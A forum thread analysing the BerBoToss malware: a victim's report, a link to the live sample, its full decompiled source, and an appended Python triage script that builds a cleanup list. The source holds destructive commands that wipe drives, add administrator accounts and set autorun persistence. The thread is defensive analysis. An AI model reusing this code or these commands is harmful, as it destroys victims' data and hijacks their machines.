blackpirate, Posted June 20, 2010

Hey, I just found a link to an app, let's say very handy to have! I thought that it's too nice to be real, so I scanned the file first on VirusTotal, without any positive result! Then the bad things happened: after running it, the app created multiple user accounts, locked mine (admin), deleted the restore point... very nasty! Can someone debug it, to see what it's all about and if I took any risk? I had some important things on my PC (passwords etc.). PLEASE BE CAREFUL! RUN IT ON A VIRTUAL MACHINE ONLY!

FILE: http://www.sendspace.com/file/w04db8

Thanks in advance!
BP
Nacho_dj, Posted June 20, 2010

Hey blackpirate, your data shouldn't be lost. To get access to your data, use ERD Commander and you should be able to access any folder of your system.

Good luck,
Nacho_dj
blackpirate (Author), Posted June 20, 2010

Thanks Nacho! As we speak I'm trying to get them back with Recover My Files Pro! Since... dunno, but 3 of my HDD partitions were formatted! And you're right, from what I see until now I can recover the entire partition! But none from C:, 'cause I reinstalled Win 7! BTW: what the f#ck1n' app was that? Glad that it didn't create a lot of damage! Thanks again!

Regards!
BP
STRELiTZIA, Posted June 25, 2010

Hi,

It is a very basic malware with aggressive behavior, language: MS Visual Basic .NET. I made a short analysis...

Analysis package contains:
1- Analysis paper (PDF)
2- Active malware, archive password: malware
3- IDA Pro database file (BerBoToss) for IDA PRO 5.5.0.925t (32-bit)

Regards

Attachment: BerBoToss analysis.rar
JMC31337, Posted June 26, 2010 (edited)

> Hi, It is a very basic malware with aggressive behavior, language: MS Visual Basic .NET. I made a short analysis... Analysis package contains: 1- Analysis paper (PDF) 2- Active malware, archive password: malware 3- IDA Pro database file (BerBoToss) for IDA PRO 5.5.0.925t (32-bit) Regards

STREL stepping up to the plate... Nice way to make an entrance...

Edited June 26, 2010 by JMC31337
JesusSpork, Posted August 19, 2010 (edited)

May be a bit late in with this post, but the program isn't obfuscated. Courtesy of .NET Reflector:

    internal sealed class Module1
    {
        // Methods
        public static void DisableTaskMgr(bool Enable)
        {
            switch (Enable)
            {
                case false:
                    MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system", "DisableTaskMgr", "0", RegistryValueKind.DWord);
                    break;
                case true:
                    MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system", "DisableTaskMgr", "1", RegistryValueKind.DWord);
                    break;
            }
        }

        [STAThread]
        public static void Main()
        {
            MyProject.Computer.FileSystem.WriteAllText(@"C:\wmnpdmod.dll", "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss", false);
            foreach (Process process in Process.GetProcessesByName("firefox")) { process.Kill(); }
            foreach (Process process2 in Process.GetProcessesByName("IEXPLORE")) { process2.Kill(); }
            foreach (Process process3 in Process.GetProcessesByName("notepad")) { process3.Kill(); }
            Interaction.Shell(@"cmd /c copy BerBoToss.exe C:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
            Interaction.Shell(@"cmd /c BerBoToss >nul >C:\WINDOWS\system32\wmp.dll", AppWinStyle.Hide, true, -1);
            Interaction.Shell("net user Administrateur /add", AppWinStyle.MinimizedFocus, false, -1);
            Interaction.Shell(@"cmd /c copy BerBoToss.exe C:\WINDOWS\BerBoToss.exe", AppWinStyle.Hide, true, -1);
            Interaction.Shell("net user Fes_L39_Berbotoss /add", AppWinStyle.MinimizedFocus, false, -1);
            DisableTaskMgr(true);
            Interaction.Shell("net user 3an9oud-La3jeb /add", AppWinStyle.MinimizedFocus, false, -1);
            MyProject.Computer.FileSystem.WriteAllText(@"C:\msimg32.dll", "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss", false);
            Interaction.Shell("net user Berbotoss_L39 /add", AppWinStyle.MinimizedFocus, false, -1);
            Interaction.Shell("net user Fes_L39_Berbotoss 1MarocBerbotossFes", AppWinStyle.MinimizedFocus, false, -1);
            Interaction.Shell("net user 3an9oud-La3jeb 1MarocBerbotossFes", AppWinStyle.MinimizedFocus, false, -1);
            Interaction.Shell("net user Administrateur 1marocberbotossfes", AppWinStyle.MinimizedFocus, false, -1);
            Interaction.Shell("label c: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
            Interaction.Shell("label d: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
            Interaction.Shell("label e: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
            Interaction.Shell("label f: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
            Interaction.Shell("label g: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
            Interaction.Shell("label h: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
            Interaction.Shell("label l: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1);
            Interaction.Shell("net user Berbotoss_L39 1MarocBerbotossFes", AppWinStyle.MinimizedFocus, false, -1);
            Interaction.Shell("cmd /c NET SESSION * /del", AppWinStyle.Hide, false, -1);
            Interaction.Shell("cmd /c NET SESSION \\poste_connect\x00e9 /del", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c rd d:\ /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c rd e:\ /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c rd f:\ /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c rd g:\ /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c del C:\*.mp3 /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c del C:\*.jpg /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c del C:\*.zip /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c del C:\*.rar /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c rd C:\WINDOWS\system32\drivers /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c del C:\*.lnk /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c del C:\*.3gp /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c del C:\*.lrc /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell("cmd /c Time 11:11.00", AppWinStyle.Hide, false, -1);
            Interaction.Shell("cmd /c date 01/1/1987", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c echo BerBoToss v1.0 > nul > C:\WINDOWS\system32\obj\Release\BerBoToss.pdb", AppWinStyle.Hide, false, -1);
            Interaction.Shell("cmd /c rundll32.exe user32.dll,LockWorkStation", AppWinStyle.Hide, true, -1);
            Process.Start("http://fassifasso.tripod.com/45313165.54436536543512155450/BerBoToss/index.html");
            Interaction.Shell(@"cmd /c del C:\*.html /s/q", AppWinStyle.Hide, false, -1);
            Interaction.Shell(@"cmd /c copy BerBoToss.exe E:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
            Interaction.Shell(@"cmd /c copy BerBoToss.exe F:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
            Interaction.Shell(@"cmd /c copy BerBoToss.exe D:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
            Interaction.Shell(@"cmd /c copy BerBoToss.exe g:\BerBoToss.exe", AppWinStyle.Hide, true, -1);
            Interaction.Shell(@"cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v BerBoToss /t REG_SZ /d C:\WINDOWS\BerBoToss.exe", AppWinStyle.Hide, true, -1);
            MyProject.Computer.Clipboard.SetText("BerBoToss V1.0");
            Interaction.Shell(@"cmd /c BerBoToss >nul >C:\WINDOWS\system32\xpsp2res.dll", AppWinStyle.Hide, true, -1);
            foreach (Process process4 in Process.GetProcessesByName("msnmsgr")) { process4.Kill(); }
            MyProject.Computer.FileSystem.WriteAllText(@"C:\kbdhe340.dll", "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss", false);
            object obj2 = Interaction.MsgBox("BerBoToss Operation !!! Chinass Hakda Kayfahmo Chinass Hakda kayssam3o Hada Message lik Ou Lihoum \x00b0+... Daba AdiosS Amigoss", MsgBoxStyle.Information, "Maroc Fes Erreur HTTA 39 - Mardankore.dll ... & ");
        }
    }

Edited August 19, 2010 by JesusSpork
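The decompiled listing above is the whole story of this sample, and the useful thing for someone in blackpirate's position is to turn it into a list of what to undo on the host (accounts, Run key, dropped files, the Task Manager policy) without executing anything. The following Python script is an added example, not code from the thread or from STRELiTZIA's analysis package: it parses Reflector-style C# output, decodes the string literals (verbatim `@"..."` and the `\x00e9`-style escapes), buckets each `Interaction.Shell` command by the behaviour it implies, collects the registry, file and process IoCs, and emits a cleanup checklist. `SAMPLE` is a constructed excerpt of the listing (a subset of its lines); the category names and the function names `triage`, `classify_command`, `cs_strings` and `cleanup_checklist` are my own.

```python
"""Static triage of a decompiled .NET sample (added example, not from the thread)."""
import re
from collections import defaultdict

# Constructed excerpt of the decompiled listing quoted in the post above
# (a subset of its lines, chosen to exercise every classifier branch).
SAMPLE = r'''
MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system", "DisableTaskMgr", "1", RegistryValueKind.DWord);
MyProject.Computer.FileSystem.WriteAllText(@"C:\wmnpdmod.dll", "BeRboToss-BeRboToss", false);
foreach (Process process in Process.GetProcessesByName("firefox")) { process.Kill(); }
Interaction.Shell(@"cmd /c copy BerBoToss.exe C:\WINDOWS\BerBoToss.exe", AppWinStyle.Hide, true, -1);
Interaction.Shell("net user Administrateur /add", AppWinStyle.MinimizedFocus, false, -1);
Interaction.Shell("net user Administrateur 1marocberbotossfes", AppWinStyle.MinimizedFocus, false, -1);
Interaction.Shell("cmd /c NET SESSION \\poste_connect\x00e9 /del", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c rd d:\ /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell(@"cmd /c del C:\*.jpg /s/q", AppWinStyle.Hide, false, -1);
Interaction.Shell("cmd /c rundll32.exe user32.dll,LockWorkStation", AppWinStyle.Hide, true, -1);
Interaction.Shell(@"cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v BerBoToss /t REG_SZ /d C:\WINDOWS\BerBoToss.exe", AppWinStyle.Hide, true, -1);
'''

# One C# string literal: verbatim @"..." (no escapes) or regular "..." (backslash escapes).
CS_STRING = re.compile(r'@"([^"]*)"|"((?:[^"\\]|\\.)*)"')

def _unescape(s: str) -> str:
    """Decode the escapes Reflector emits in regular strings: \\xHHHH, \\\\, \\", \\n, \\t."""
    def repl(m):
        esc = m.group(1)
        if esc[0] == "x":
            return chr(int(esc[1:], 16))
        return {"n": "\n", "t": "\t"}.get(esc, esc)  # \\ and \" decode to themselves
    return re.sub(r'\\(x[0-9a-fA-F]{1,4}|.)', repl, s)

def cs_strings(line: str) -> list:
    """Return the decoded string literals of one decompiled line, in source order."""
    return [m.group(1).replace('""', '"') if m.group(1) is not None else _unescape(m.group(2))
            for m in CS_STRING.finditer(line)]

def classify_command(cmd: str, found: dict) -> None:
    """Bucket one Interaction.Shell command by the host behaviour it implies."""
    words, low = cmd.split(), cmd.lower()
    if low.startswith("net user") and len(words) >= 3:
        found["accounts_created" if "/add" in words else "passwords_set"].append(words[2])
    elif "reg add" in low:  # autorun persistence: keep (value name, target path)
        m = re.search(r"/v\s+(\S+).*?/d\s+(\S+)", cmd)
        found["persistence"].append((m.group(1), m.group(2)) if m else (cmd, "?"))
    elif re.match(r"cmd /c (rd|del) ", low):
        found["destructive"].append(cmd)
    elif low.startswith("cmd /c copy"):
        found["self_copies"].append(words[-1])
    elif low.startswith("label "):
        found["volume_relabel"].append(words[1])
    elif "lockworkstation" in low:
        found["lockout"].append(cmd)
    elif "net session" in low:
        found["session_drops"].append(cmd)
    elif re.match(r"cmd /c (time|date) ", low):
        found["clock_tamper"].append(cmd)
    else:
        found["other"].append(cmd)

def triage(decompiled: str) -> dict:
    """Walk the decompiled text and collect behaviours and host IoCs by category."""
    found = defaultdict(list)
    for line in decompiled.splitlines():
        strings = cs_strings(line)
        if not strings:
            continue
        if "Interaction.Shell(" in line:
            classify_command(strings[0], found)
        elif "Registry.SetValue(" in line and len(strings) >= 3:
            found["registry_writes"].append(tuple(strings[:3]))  # (key, value name, data)
        elif "WriteAllText(" in line:
            found["dropped_files"].append(strings[0])
        elif "GetProcessesByName(" in line:
            found["killed_processes"].append(strings[0])
    return dict(found)

def cleanup_checklist(report: dict) -> list:
    """Turn the triage report into the host-level undo list a responder works through."""
    items = [f"remove local account: {name}" for name in report.get("accounts_created", [])]
    items += [f"delete Run value {value!r} pointing at {path}" for value, path in report.get("persistence", [])]
    items += [f"delete dropped file: {path}"
              for path in report.get("dropped_files", []) + report.get("self_copies", [])]
    items += [f"reset {name} under {key}" for key, name, data in report.get("registry_writes", [])
              if name == "DisableTaskMgr" and data == "1"]
    return items

if __name__ == "__main__":
    report = triage(SAMPLE)
    for category, entries in sorted(report.items()):
        print(f"{category}: {entries}")
    print("\n".join(cleanup_checklist(report)))
```

Run against the full listing instead of `SAMPLE`, the report lists the four `net user ... /add` accounts, the `BerBoToss` Run value, the three dropped `.dll` files in `C:\`, the self-copies on every drive letter, and thirteen `rd`/`del` commands, which is the list to walk through on a machine that ran it (the `rd`/`del` entries are what explain the formatted-looking partitions in the thread). Volume labels, clock changes and session drops come out as separate buckets so they are not mistaken for the persistence or destruction the host actually needs repaired.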